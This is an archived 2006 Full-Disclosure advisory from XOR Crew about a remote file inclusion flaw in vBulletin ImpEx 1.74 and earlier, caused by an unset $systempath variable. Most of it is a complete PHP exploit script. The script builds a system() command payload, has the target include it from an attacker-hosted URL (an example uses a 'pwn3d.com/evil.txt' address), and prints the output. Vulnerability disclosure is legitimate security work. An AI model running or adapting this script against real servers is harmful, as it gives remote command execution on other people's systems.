Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11916
HistoryMar 23, 2006 - 12:00 a.m.

[Full-disclosure] XOR Crew :: vBulletin ImpEx <= 1.74 - Remote Command Execution Vulnerability

2006-03-2300:00:00
vulners.com
71
JSON

=======================================================================================
XOR Crew :: Security Advisory
3/22/2006

vBulletin ImpEx <= 1.74 - Remote Command Execution Vulnerability

http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN

:: Summary

   Vendor       :  vBulletin
   Vendor Site  :  http://www.vbulletin.com/docs/html/impex
   Product&#40;s&#41;   :  Impex - vBulletin Import / Export System
   Version&#40;s&#41;   :  All
   Severity     :  Medium/High
   Impact       :  Remote Command Execution
   Release Date :  3/22/2006
   Credits      :  ReZEN &#40;rezen &#40;a&#41; xorcrew &#40;.&#41; net&#41;

=======================================================================================

I. Description

The ImpEx (Import / Export) system is the core system for importing from
other forum software into vBulletin version 3.5.0 or higher.

=======================================================================================

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote
command execution in the /ImpExData.php file. The bug is here:

require_once ($systempath . 'impex/ImpExDatabase.php');

the $systempath variable is not set prior to being used in the
require_once() function. The vendor and support team have been contacted.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php
/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url: http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"

 .&quot;&lt;/form&gt;&lt;HR WIDTH=&#92;&quot;650&#92;&quot; ALIGN=&#92;&quot;LEFT&#92;&quot;&gt;&quot;;

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}

echo $form;

while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>

------END------

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

uh ohs!! + /srv/web/lotfree/ + LOTFREE uid 1010 = Lame Frenchies

=======================================================================================

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON